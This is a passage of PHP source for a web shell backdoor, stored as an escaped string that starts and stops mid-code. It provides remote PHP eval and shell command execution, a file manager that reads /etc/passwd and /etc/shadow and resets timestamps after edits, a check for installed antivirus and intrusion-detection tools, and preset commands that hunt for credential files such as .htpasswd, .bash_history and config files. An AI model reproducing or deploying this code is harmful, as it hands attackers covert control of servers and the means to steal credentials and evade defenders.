anything\\n":$▖);\r\n}\r\nfunction viewSize($s) {\r\n\tif($s >= 1073741824)\r\n\t\treturn sprintf(\'%1.2f\', $s / 1073741824 ). \' GB\';\r\n\telseif($s >= 1048576)\r\n\t\treturn sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\';\r\n\telseif($s >= 1024)\r\n\t\treturn sprintf(\'%1.2f\', $s / 1024 ) . \' KB\';\r\n\telse\r\n\t\treturn $s . \' B\';\r\n}\r\nfunction perms($p) {\r\n\tif (($p & 0xC000) == 0xC000)$i = \'s\';\r\n\telseif (($p & 0xA000) == 0xA000)$i = \'l\';\r\n\telseif (($p & 0x8000) == 0x8000)$i = \'-\';\r\n\telseif (($p & 0x6000) == 0x6000)$i = \'b\';\r\n\telseif (($p & 0x4000) == 0x4000)$i = \'d\';\r\n\telseif (($p & 0x2000) == 0x2000)$i = \'c\';\r\n\telseif (($p & 0x1000) == 0x1000)$i = \'p\';\r\n\telse $i = \'u\';\r\n\t$i .= (($p & 0x0100) ? \'r\' : \'-\');\r\n\t$i .= (($p & 0x0080) ? \'w\' : \'-\');\r\n\t$i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\'));\r\n\t$i .= (($p & 0x0020) ? \'r\' : \'-\');\r\n\t$i .= (($p & 0x0010) ? \'w\' : \'-\');\r\n\t$i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\'));\r\n\t$i .= (($p & 0x0004) ? \'r\' : \'-\');\r\n\t$i .= (($p & 0x0002) ? \'w\' : \'-\');\r\n\t$i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? \'T\' : \'-\'));\r\n\treturn $i;\r\n}\r\nfunction viewPermsColor($f) {\r\n\tif (!@is_readable($f))\r\n\t\treturn \'<font color=#FF0000><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n\telseif (!@is_writable($f))\r\n\t\treturn \'<font color=white><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n\telse\r\n\t\treturn \'<font color=#f9c440><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n}\r\nfunction hardScandir($dir) {\r\n if(function_exists("scandir")) {\r\n return scandir($dir);\r\n } else {\r\n $dh = opendir($dir);\r\n while (false !== ($filename = readdir($dh)))\r\n $files[] = $filename;\r\n return $files;\r\n }\r\n}\r\nfunction which($p) {\r\n\t$path = ex(\'which \' . $p);\r\n\tif(!empty($path))\r\n\t\treturn $path;\r\n\treturn false;\r\n}\r\nfunction actionRC() {\r\n\tif(!@$_POST[\'p1\']) {\r\n\t\t$a = array(\r\n\t\t\t"uname" => php_uname(),\r\n\t\t\t"php_version" => phpversion(),\r\n\t\t\t"VERSION" => VERSION,\r\n\t\t\t"safemode" => @ini_get(\'safe_mode\')\r\n\t\t);\r\n\t\techo serialize($a);\r\n\t} else {\r\n\t\teval($_POST[\'p1\']);\r\n\t}\r\n}\r\nfunction prototype($k, $v) {\r\n $_COOKIE[$k] = $v;\r\n setcookie($k, $v);\r\n}\r\nfunction actionSecInfo() {\r\n\thardHeader();\r\n\techo \'<h1>Server security information</h1><div class=content>\';\r\n\tfunction showSecParam($n, $v) {\r\n\t\t$v = trim($v);\r\n\t\tif($v) {\r\n\t\t\techo \'<span>\' . $n . \': </span>\';\r\n\t\t\tif(strpos($v, "\\n") === false)\r\n\t\t\t\techo $v . \'<br>\';\r\n\t\t\telse\r\n\t\t\t\techo \'<pre class=ml1>\' . $v . \'</pre>\';\r\n\t\t}\r\n\t}\r\n\tshowSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\'));\r\n if(function_exists(\'apache_get_modules\'))\r\n showSecParam(\'Loaded Apache modules\', implode(\', \', apache_get_modules()));\r\n\tshowSecParam(\'Disabled PHP Functions\', $GLOBALS[\'disable_functions\']?$GLOBALS[\'disable_functions\']:\'none\');\r\n\tshowSecParam(\'Open base dir\', @ini_get(\'open_basedir\'));\r\n\tshowSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\'));\r\n\tshowSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\'));\r\n\tshowSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\');\r\n\t$temp=array();\r\n\tif(function_exists(\'mysql_get_client_info\'))\r\n\t\t$temp[] = "MySql (".mysql_get_client_info().")";\r\n\tif(function_exists(\'mssql_connect\'))\r\n\t\t$temp[] = "MSSQL";\r\n\tif(function_exists(\'pg_connect\'))\r\n\t\t$temp[] = "PostgreSQL";\r\n\tif(function_exists(\'oci_connect\'))\r\n\t\t$temp[] = "Oracle";\r\n\tshowSecParam(\'Supported databases\', implode(\', \', $temp));\r\n\techo \'<br>\';\r\n\tif($GLOBALS[\'os\'] == \'nix\') {\r\n showSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"/etc/\\", \\"passwd\\")\'>[view]</a>":\'no\');\r\n showSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"/etc/\\", \\"shadow\\")\'>[view]</a>":\'no\');\r\n showSecParam(\'OS version\', @file_get_contents(\'/proc/version\'));\r\n showSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\'));\r\n if(!$GLOBALS[\'safe_mode\']) {\r\n $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n $danger = array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\');\r\n $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n echo \'<br>\';\r\n $temp=array();\r\n foreach ($userful as $▟)\r\n if(which($▟))\r\n $temp[] = $▟;\r\n showSecParam(\'Userful\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($danger as $▟)\r\n if(which($▟))\r\n $temp[] = $▟;\r\n showSecParam(\'Danger\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($downloaders as $▟)\r\n if(which($▟))\r\n $temp[] = $▟;\r\n showSecParam(\'Downloaders\', implode(\', \',$temp));\r\n echo \'<br/>\';\r\n showSecParam(\'HDD space\', ex(\'df -h\'));\r\n showSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\'));\r\n\t\t\t\tshowSecParam(\'Mount options\', @file_get_contents(\'/etc/fstab\'));\r\n }\r\n\t} else {\r\n\t\tshowSecParam(\'OS Version\',ex(\'ver\'));\r\n\t\tshowSecParam(\'Account Settings\', iconv(\'CP866\', \'UTF-8\',ex(\'net accounts\')));\r\n\t\tshowSecParam(\'User Accounts\', iconv(\'CP866\', \'UTF-8\',ex(\'net user\')));\r\n\t}\r\n\techo \'</div>\';\r\n\thardFooter();\r\n}\r\nfunction actionFilesTools() {\r\n\tif( isset($_POST[\'p1\']) )\r\n\t\t$_POST[\'p1\'] = urldecode($_POST[\'p1\']);\r\n\tif(@$_POST[\'p2\']==\'download\') {\r\n\t\tif(@is_file($_POST[\'p1\']) && @is_readable($_POST[\'p1\'])) {\r\n\t\t\tob_start("ob_gzhandler", 4096);\r\n\t\t\theader("Content-Disposition: attachment; filename=".basename($_POST[\'p1\']));\r\n\t\t\tif (function_exists("mime_content_type")) {\r\n\t\t\t\t$type = @mime_content_type($_POST[\'p1\']);\r\n\t\t\t\theader("Content-Type: " . $type);\r\n\t\t\t} else\r\n header("Content-Type: application/octet-stream");\r\n\t\t\t$fp = @fopen($_POST[\'p1\'], "r");\r\n\t\t\tif($fp) {\r\n\t\t\t\twhile(!@feof($fp))\r\n\t\t\t\t\techo @fread($fp, 1024);\r\n\t\t\t\tfclose($fp);\r\n\t\t\t}\r\n\t\t}exit;\r\n\t}\r\n\tif( @$_POST[\'p2\'] == \'mkfile\' ) {\r\n\t\tif(!file_exists($_POST[\'p1\'])) {\r\n\t\t\t$fp = @fopen($_POST[\'p1\'], \'w\');\r\n\t\t\tif($fp) {\r\n\t\t\t\t$_POST[\'p2\'] = "edit";\r\n\t\t\t\tfclose($fp);\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\thardHeader();\r\n\techo \'<h1>File tools</h1><div class=content>\';\r\n\tif( !file_exists(@$_POST[\'p1\']) ) {\r\n\t\techo \'File not exists\';\r\n\t\thardFooter();\r\n\t\treturn;\r\n\t}\r\n\t$uid = @posix_getpwuid(@fileowner($_POST[\'p1\']));\r\n\tif(!$uid) {\r\n\t\t$uid[\'name\'] = @fileowner($_POST[\'p1\']);\r\n\t\t$gid[\'name\'] = @filegroup($_POST[\'p1\']);\r\n\t} else $gid = @posix_getgrgid(@filegroup($_POST[\'p1\']));\r\n\techo \'<span>Name:</span> \'.htmlspecialchars(@basename($_POST[\'p1\'])).\' <span>Size:</span> \'.(is_file($_POST[\'p1\'])?viewSize(filesize($_POST[\'p1\'])):\'-\').\' <span>Permission:</span> \'.viewPermsColor($_POST[\'p1\']).\' <span>Owner/Group:</span> \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'<br>\';\r\n\techo \'<span>Create time:</span> \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' <span>Access time:</span> \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' <span>Modify time:</span> \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'<br><br>\';\r\n\tif( empty($_POST[\'p2\']) )\r\n\t\t$_POST[\'p2\'] = \'view\';\r\n\tif( is_file($_POST[\'p1\']) )\r\n\t\t$m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\', \'Frame\');\r\n\telse\r\n\t\t$m = array(\'Chmod\', \'Rename\', \'Touch\');\r\n\tforeach($m as $v)\r\n\t\techo \'<a href=# onclick="g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',\\\'\'.strtolower($v).\'\\\')">\'.((strtolower($v)==@$_POST[\'p2\'])?\'<b>[ \'.$v.\' ]</b>\':$v).\'</a> \';\r\n\techo \'<br><br>\';\r\n\tswitch($_POST[\'p2\']) {\r\n\t\tcase \'view\':\r\n\t\t\techo \'<pre class=ml1>\';\r\n\t\t\t$fp = @fopen($_POST[\'p1\'], \'r\');\r\n\t\t\tif($fp) {\r\n\t\t\t\twhile( !@feof($fp) )\r\n\t\t\t\t\techo htmlspecialchars(@fread($fp, 1024));\r\n\t\t\t\t@fclose($fp);\r\n\t\t\t}\r\n\t\t\techo \'</pre>\';\r\n\t\t\tbreak;\r\n\t\tcase \'highlight\':\r\n\t\t\tif( @is_readable($_POST[\'p1\']) ) {\r\n\t\t\t\techo \'<div class=ml1 style="background-color: #e1e1e1;color:black;">\';\r\n\t\t\t\t$oRb = @highlight_file($_POST[\'p1\'],true);\r\n\t\t\t\techo str_replace(array(\'<span \',\'</span>\'), array(\'<font \',\'</font>\'),$oRb).\'</div>\';\r\n\t\t\t}\r\n\t\t\tbreak;\r\n\t\tcase \'chmod\':\r\n\t\t\tif( !empty($_POST[\'p3\']) ) {\r\n\t\t\t\t$perms = 0;\r\n\t\t\t\tfor($i=strlen($_POST[\'p3\'])-1;$i>=0;--$i)\r\n\t\t\t\t\t$perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1));\r\n\t\t\t\tif(!@chmod($_POST[\'p1\'], $perms))\r\n\t\t\t\t\techo \'Can\\\'t set permissions!<br><script>document.mf.p3.value="";</script>\';\r\n\t\t\t}\r\n\t\t\tclearstatcache();\r\n\t\t\techo \'<script>p3_="";</script><form onsubmit="g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',null,this.chmod.value);return false;"><input type=text name=chmod value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'p1\'])),-4).\'"><input type=submit value="submit"></form>\';\r\n\t\t\tbreak;\r\n\t\tcase \'edit\':\r\n\t\t\tif( !is_writable($_POST[\'p1\'])) {\r\n\t\t\t\techo \'File isn\\\'t writeable\';\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\tif( !empty($_POST[\'p3\']) ) {\r\n\t\t\t\t$time = @filemtime($_POST[\'p1\']);\r\n\t\t\t\t$_POST[\'p3\'] = substr($_POST[\'p3\'],1);\r\n\t\t\t\t$fp = @fopen($_POST[\'p1\'],"w");\r\n\t\t\t\tif($fp) {\r\n\t\t\t\t\t@fwrite($fp,$_POST[\'p3\']);\r\n\t\t\t\t\t@fclose($fp);\r\n\t\t\t\t\techo \'Saved!<br><script>p3_="";</script>\';\r\n\t\t\t\t\t@touch($_POST[\'p1\'],$time,$time);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\techo \'<form onsubmit="g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',null,\\\'1\\\'+this.text.value);return false;"><textarea name=text class=bigarea>\';\r\n\t\t\t$fp = @fopen($_POST[\'p1\'], \'r\');\r\n\t\t\tif($fp) {\r\n\t\t\t\twhile( !@feof($fp) )\r\n\t\t\t\t\techo htmlspecialchars(@fread($fp, 1024));\r\n\t\t\t\t@fclose($fp);\r\n\t\t\t}\r\n\t\t\techo \'</textarea><input type=submit value="submit"></form>\';\r\n\t\t\tbreak;\r\n\t\tcase \'hexdump\':\r\n\t\t\t$c = @file_get_contents($_POST[\'p1\']);\r\n\t\t\t$n = 0;\r\n\t\t\t$h = array(\'00000000<br>\',\'\',\'\');\r\n\t\t\t$len = strlen($c);\r\n\t\t\tfor ($i=0; $i<$len; ++$i) {\r\n\t\t\t\t$h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';\r\n\t\t\t\tswitch ( ord($c[$i]) ) {\r\n\t\t\t\t\tcase 0: $h[2] .= \' \'; break;\r\n\t\t\t\t\tcase 9: $h[2] .= \' \'; break;\r\n\t\t\t\t\tcase 10: $h[2] .= \' \'; break;\r\n\t\t\t\t\tcase 13: $h[2] .= \' \'; break;\r\n\t\t\t\t\tdefault: $h[2] .= $c[$i]; break;\r\n\t\t\t\t}\r\n\t\t\t\t$n++;\r\n\t\t\t\tif ($n == 32) {\r\n\t\t\t\t\t$n = 0;\r\n\t\t\t\t\tif ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'<br>\';}\r\n\t\t\t\t\t$h[1] .= \'<br>\';\r\n\t\t\t\t\t$h[2] .= "\\n";\r\n\t\t\t\t}\r\n\t\t \t}\r\n\t\t\techo \'<table cellspacing=1 cellpadding=5 bgcolor=#1a1a1a><tr><td bgcolor=#202832><span style="font-weight: normal;"><pre>\'.$h[0].\'</pre></span></td><td bgcolor=#060a10><pre>\'.$h[1].\'</pre></td><td bgcolor=#202832><pre>\'.htmlspecialchars($h[2]).\'</pre></td></tr></table>\';\r\n\t\t\tbreak;\r\n\t\tcase \'rename\':\r\n\t\t\tif( !empty($_POST[\'p3\']) ) {\r\n\t\t\t\tif(!@rename($_POST[\'p1\'], $_POST[\'p3\']))\r\n\t\t\t\t\techo \'Can\\\'t rename!<br>\';\r\n\t\t\t\telse\r\n\t\t\t\t\tdie(\'<script>g(null,null,"\'.urlencode($_POST[\'p3\']).\'",null,"")</script>\');\r\n\t\t\t}\r\n\t\t\techo \'<form onsubmit="g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',null,this.name.value);return false;"><input type=text name=name value="\'.htmlspecialchars($_POST[\'p1\']).\'"><input type=submit value="submit"></form>\';\r\n\t\t\tbreak;\r\n\t\tcase \'touch\':\r\n\t\t\tif( !empty($_POST[\'p3\']) ) {\r\n\t\t\t\t$time = strtotime($_POST[\'p3\']);\r\n\t\t\t\tif($time) {\r\n\t\t\t\t\tif(!touch($_POST[\'p1\'],$time,$time))\r\n\t\t\t\t\t\techo \'Fail!\';\r\n\t\t\t\t\telse\r\n\t\t\t\t\t\techo \'Touched!\';\r\n\t\t\t\t} else echo \'Bad time format!\';\r\n\t\t\t}\r\n\t\t\tclearstatcache();\r\n\t\t\techo \'<script>p3_="";</script><form onsubmit="g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',null,this.touch.value);return false;"><input type=text name=touch value="\'.date("Y-m-d H:i:s", @filemtime($_POST[\'p1\'])).\'"><input type=submit value="submit"></form>\';\r\n\t\t\tbreak;\r\n\t\t/* (С) 12.2015 mitryz */\r\n\t\tcase \'frame\':\r\n\t\t\t$frameSrc = substr(htmlspecialchars($GLOBALS[\'cwd\']), strlen(htmlspecialchars($_SERVER[\'DOCUMENT_ROOT\'])));\r\n\t\t\tif ($frameSrc[0] != \'/\')\r\n\t\t\t\t$frameSrc = \'/\' . $frameSrc;\r\n\t\t\tif ($frameSrc[strlen($frameSrc) - 1] != \'/\')\r\n\t\t\t\t$frameSrc = $frameSrc . \'/\';\r\n\t\t\t$frameSrc = $frameSrc . htmlspecialchars($_POST[\'p1\']);\r\n\t\t\techo \'<iframe width="100%" height="900px" scrolling="no" src=\'.$frameSrc.\' onload="onload=height=contentDocument.body.scrollHeight"></iframe>\';\r\n\t\t\tbreak;\r\n\t}\r\n\techo \'</div>\';\r\n\thardFooter();\r\n}\r\nif($os == \'win\')\r\n\t$aliases = array(\r\n\t\t"List Directory" => "dir",\r\n \t"Find index.php in current dir" => "dir /s /w /b index.php",\r\n \t"Find *config*.php in current dir" => "dir /s /w /b *config*.php",\r\n \t"Show active connections" => "netstat -an",\r\n \t"Show running services" => "net start",\r\n \t"User accounts" => "net user",\r\n \t"Show computers" => "net view",\r\n\t\t"ARP Table" => "arp -a",\r\n\t\t"IP Configuration" => "ipconfig /all"\r\n\t);\r\nelse\r\n\t$aliases = array(\r\n \t\t"List dir" => "ls -lha",\r\n\t\t"list file attributes on a Linux second extended file system" => "lsattr -va",\r\n \t\t"show opened ports" => "netstat -an | grep -i listen",\r\n "process status" => "ps aux",\r\n\t\t"Find" => "",\r\n \t\t"find all suid files" => "find / -type f -perm -04000 -ls",\r\n \t\t"find suid files in current dir" => "find . -type f -perm -04000 -ls",\r\n \t\t"find all sgid files" => "find / -type f -perm -02000 -ls",\r\n \t\t"find sgid files in current dir" => "find . -type f -perm -02000 -ls",\r\n \t\t"find config.inc.php files" => "find / -type f -name config.inc.php",\r\n \t\t"find config* files" => "find / -type f -name \\"config*\\"",\r\n \t\t"find config* files in current dir" => "find . -type f -name \\"config*\\"",\r\n \t\t"find all writable folders and files" => "find / -perm -2 -ls",\r\n \t\t"find all writable folders and files in current dir" => "find . -perm -2 -ls",\r\n \t\t"find all service.pwd files" => "find / -type f -name service.pwd",\r\n \t\t"find service.pwd files in current dir" => "find . -type f -name service.pwd",\r\n \t\t"find all .htpasswd files" => "find / -type f -name .htpasswd",\r\n \t\t"find .htpasswd files in current dir" => "find . -type f -name .htpasswd",\r\n \t\t"find all .bash_history files" => "find / -type f -name .bash_history",\r\n \t\t"find .bash_history files in current dir" => "find . -type f -name .bash_history",\r\n \t\t"find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",\r\n \t\t"find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",\r\n\t\t"Locate" => "",\r\n \t\t"locate httpd.conf files" => "locate httpd.conf",\r\n\t\t"locate vhosts.conf files" => "locate vhosts.conf",\r\n\t\t"locate proftpd.conf files" => "locate proftpd.conf",\r\n\t\t"locate psybnc.conf files" => "locate psybnc.conf",\r\n\t\t"locate my.conf files" => "locate my.conf",\r\n\t\t"locate admin.php files" =>"locate admin.php",\r\n\t\t"locate cfg.php files" => "locate cfg.php",\r\n\t\t"locate conf.php files" => "locate conf.php",\r\n\t\t"locate config.dat files" => "locate config.dat",\r\n\t\t"locate config.php files" => "locate config.php",\r\n\t\t"locate config.inc files" => "locate config.inc",\r\n\t\t"locate config.inc.php" => "locate config.inc.php",\r\n\t\t"locate config.default.php files" => "locate config.default.php",\r\n\t\t"locate config* files " => "locate config",\r\n\t\t"locate .conf files"=>"locate \'.conf\'",\r\n\t\t"locate .pwd files" => "locate \'.pwd\'",\r\n\t\t"locate .sql files" => "locate \'.sql\'",\r\n\t\t"locate .htpasswd files" => "locate \'.htpasswd\'",\r\n\t\t"locate .bash_history files" => "locate \'.bash_history\'",\r\n\t\t"locate .mysql_history files" => "locate \'.mysql_history\'",\r\n\t\t"locate .fetchmailrc files" => "locate \'.fetchmailrc\'",\r\n\t\t"locate backup files" => "locate backup",\r\n\t\t"locate dump files" => "locate dump",\r\n\t\t"locate priv files" => "locate priv"\r\n\t);\r\nfunction actionConsole() {\r\n if(!empty($_POST[\'p1\']) && !empty($_POST[\'p2\'])) {\r\n prototype(md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\', true);\r\n $_POST[\'p1\'] .= \' 2>&1\';\r\n } elseif(!empty($_POST[\'p1\']))\r\n prototype(md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\', 0);\r\n\tif(isset($_POST[\'ajax\'])) {\r\n\t\tprototype(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', true);\r\n\t\tob_start();\r\n\t\techo "d.cf.cmd.value=\'\';\\n";\r\n\t\t$temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes("\\n$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']),"\\n\\r\\t\\\'\\0"));\r\n\t\tif(preg_match("!.*cd\\s+([^;]+)$!",$_POST[\'p1\'],$match))\t{\r\n\t\t\tif(@chdir($match[1])) {\r\n\t\t\t\t$GLOBALS[\'cwd\'] = @getcwd();\r\n\t\t\t\techo "c_=\'".$GLOBALS[\'cwd\']."\';";\r\n\t\t\t}\r\n\t\t}\r\n\t\techo "d.cf.output.value+=\'".$temp."\';";\r\n\t\techo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";\r\n\t\t$temp = ob_get_clean();\r\n\t\techo strlen($temp), "\\n", $temp;\r\n\t\texit;\r\n\t}\r\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\']))\r\n\t\tprototype(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', 0);\r\n\thardHeader();\r\n echo "<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\nvar cmds = new Array(\'\');\r\nvar cur = 0;\r\nfunction kp(e) {\r\n\tvar n = (window.Event) ? e.which : e.keyCode;\r\n\tif(n == 38) {\r\n\t\tcur--;\r\n\t\tif(cur>=0)\r\n\t\t\tdocument.cf.cmd.value = cmds[cur];\r\n\t\telse\r\n\t\t\tcur++;\r\n\t} else if(n == 40) {\r\n\t\tcur++;\r\n\t\tif(cur < cmds.length)\r\n\t\t\tdocument.cf.cmd.value = cmds[cur];\r\n\t\telse\r\n\t\t\tcur--;\r\n\t}\r\n}\r\nfunction add(cmd) {\r\n\tcmds.pop();\r\n\tcmds.push(cmd);\r\n\tcmds.push(\'\');\r\n\tcur = cmds.length-1;\r\n}\r\n</script>";\r\n\techo \'<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\\\'clear\\\'){d.cf.output.value=\\\'\\\';d.cf.cmd.value=\\\'\\\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\\\'\\\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\\\'\\\');} return false;"><label><select name=alias>\';\r\n\tforeach($GLOBALS[\'aliases\'] as $n => $v) {\r\n\t\tif($v == \'\') {\r\n\t\t\techo \'<optgroup label="-\'.htmlspecialchars($n).\'-"></optgroup>\';\r\n\t\t\tcontinue;\r\n\t\t}\r\n\t\techo \'<option value="\'.htmlspecialchars($v).\'">\'.$n.\'</option>\';\r\n\t}\r\n\techo \'</select></label><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\\\'\\\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\\\'\\\');}" value="submit"> <nobr><input type=checkbox name=ajax value=1 \'.(@$_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX <input type=checkbox name=show_errors value=1 \'.(!empty($_POST[\'p2\'])||$_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\']?\'checked\':\'\').\'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin-top:5px;" readonly>\';\r\n\tif(!empty($_POST[\'p1\'])) {\r\n\t\techo htmlspecialchars("$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']));\r\n\t}\r\n\techo \'</textarea><table style="border:1px solid #060a10;background-color:#060a10;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td style="padding-left:4px; width:13px;">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>\';\r\n\techo \'</form></div><script>d.cf.cmd.focus();</script>\';\r\n\thardFooter();\r\n}\r\nfunction actionPhp() {\r\n\tif( isset($_POST[\'ajax\']) ) {\r\n\t\t$_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n\t\tob_start();\r\n\t\teval($_POST[\'p1\']);\r\n\t\t$temp = "document.getElementById(\'PhpOutput\').style.display=\'\';document.getElementById(\'PhpOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\\n";\r\n\t\techo strlen($temp), "\\n", $temp;\r\n\t\texit;\r\n\t}\r\n\thardHeader();\r\n\tif( isset($_POST[\'p2\']) && ($_POST[\'p2\'] == \'info\') ) {\r\n\t\techo \'<h1>PHP info</h1><div class=content>\';\r\n\t\tob_start();\r\n\t\tphpinfo();\r\n\t\t$tmp = ob_get_clean();\r\n\t\t$tmp = preg_replace(\'!body {.*}!msiU\',\'\',$tmp);\r\n\t\t$tmp = preg_replace(\'!a:\\w+ {.*}!msiU\',\'\',$tmp);\r\n\t\t$tmp = preg_replace(\'!h1!msiU\',\'h2\',$tmp);\r\n\t\t$tmp = preg_replace(\'!td, th {(.*)}!msiU\',\'.e, .v, .h, .h th {$1}\',$tmp);\r\n\t\t$tmp = preg_replace(\'!body, td, th, h2, h2 {.*}!msiU\',\'\',$tmp);\r\n\t\techo $tmp;\r\n\t\techo \'</div><br>\';\r\n\t}\r\n\tif(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\']))\r\n\t\t$_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n\t\techo \'<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\\\'\\\');}return false;"><textarea name=code class=bigarea id=PhpCode>\'.(!empty($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'</textarea><input type=submit value=Eval style="margin-top:5px">\';\r\n\techo \' <input type=checkbox name=ajax value=1 \'.($_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX</form><pre id=PhpOutput style="\'.(empty($_POST[\'p1\'])?\'display:none;\':\'\').\'margin-top:5px;" class=ml1>\';\r\n\tif(!empty($_POST[\'p1\'])) {\r\n\t\tob_start();\r\n\t\teval($_POST[\'p1\']);\r\n\t\techo htmlspecialchars(ob_get_clean());\r\n\t}\r\n\techo \'</pre></div>\';\r\n\thardFooter();\r\n}\r\nfunction actionFilesMan() {\r\n if (!empty ($_COOKIE[\'f\']))\r\n $_COOKIE[\'f\'] = @unserialize($_COOKIE[\'f\']);\r\n\tif(!empty($_POST[\'p1\'])) {\r\n\t\tswitch($_POST[\'p1\']) {\r\n\t\t\tcase \'uploadFile\':\r\n\t\t\t\tif ( is_array($_FILES[\'f\'][\'tmp_name\']) ) {\r\n\t\t\t\t\tforeach ( $_FILES[\'f\'][\'tmp_name\'] as $i => $tmpName ) {\r\n if(!@move_uploaded_file($tmpName, $_FILES[\'f\'][\'name\'][$i])) {\r\n echo "Can\'t upload file!";\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase \'mkdir\':\r\n\t\t\t\tif(!@mkdir($_POST[\'p2\']))\r\n\t\t\t\t\techo "Can\'t create new dir";\r\n\t\t\t\tbreak;\r\n\t\t\tcase \'delete\':\r\n\t\t\t\tfunction deleteDir($path) {\r\n\t\t\t\t\t$path = (substr($path,-1)==\'/\') ? $path:$path.\'/\';\r\n\t\t\t\t\t$dh = opendir($path);\r\n\t\t\t\t\twhile ( ($▟ = readdir($dh) ) !== false) {\r\n\t\t\t\t\t\t$▟ = $path.$▟;\r\n\t\t\t\t\t\tif ( (basename($▟) == "..") || (basename($▟) == ".") )\r\n\t\t\t\t\t\t\tcontinue;\r\n\t\t\t\t\t\t$type = filetype($▟);\r\n\t\t\t\t\t\tif ($type == 